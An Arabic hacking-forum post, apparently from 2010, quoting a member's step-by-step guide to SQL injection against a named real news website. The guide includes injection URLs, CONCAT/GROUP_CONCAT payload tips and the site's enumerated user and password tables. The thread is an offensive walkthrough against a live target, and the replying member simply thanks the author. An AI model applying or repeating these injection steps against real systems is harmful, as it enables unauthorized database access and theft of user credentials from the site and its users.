عرض مشاركة واحدة
قديم 09-06-2010, 03:55 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
Master vbspiders
 
الصورة الرمزية Master vbspiders
 

 

 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عبد الله ر
اها اخي مشكلتك بسيطة جدا جدا
المشكلة انك وضعت بالحقنة

ConCaT(id,0x3a,pass)

اولا قلي كيف كنت حتجيب اليوزر بهالحقنة !
هذه الحقنة لا تظهر لك سوى الـ id فقط اذا حذفت الباس منها
ليش ؟
انتبه منيح على كلمة pass
انا استخرجت العواميد بهذه الحقنة وكان اسم عمود الباس هكذا
PASSWORD مش pass
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

انتبه جيدا اخي فالمعلومات التي ستضعها بالحقنة تكون مأخوذة من الحقنة السابقة
طيب نتابع

انا تابعت بهذا الجدول ويبدو انه لا يحوي على شيء انظر
الحقنة
http://www.alghadnews.com/show.php?i...om+siteusers--

طيب شو رايك نعود للأول عند الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

ونضيف عليها group_ هكذا
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--



الان تظهر لنا جميع الجداول التي تحتوي على كلمة %pass% مشفرة
وهي

siteusers:PASSWORD:alghad_news
sms:password:alghad_news
testnewsletter:pass:alghad_news
users:password:alghad_news


نحنا جربنا على الاول طب الان منجرب على غيره لحد ما نوصل للمطلوب
نصيحة اخي عندما تكون باول مرحلة وهي للبحث عن الجداول التي تحوي كلمة باس مشفرة
ضع group في الحقنة
حتى لا تضيع وقت بحقن جدول غير مطلوب

ان شاء الله اكون قد وفقت في الشرح


كفيت ووفيت
بارك الله فيك يا غالي
وبالتوفيق
تحياتي
التوقيع

^_^



 

   

رد مع اقتباس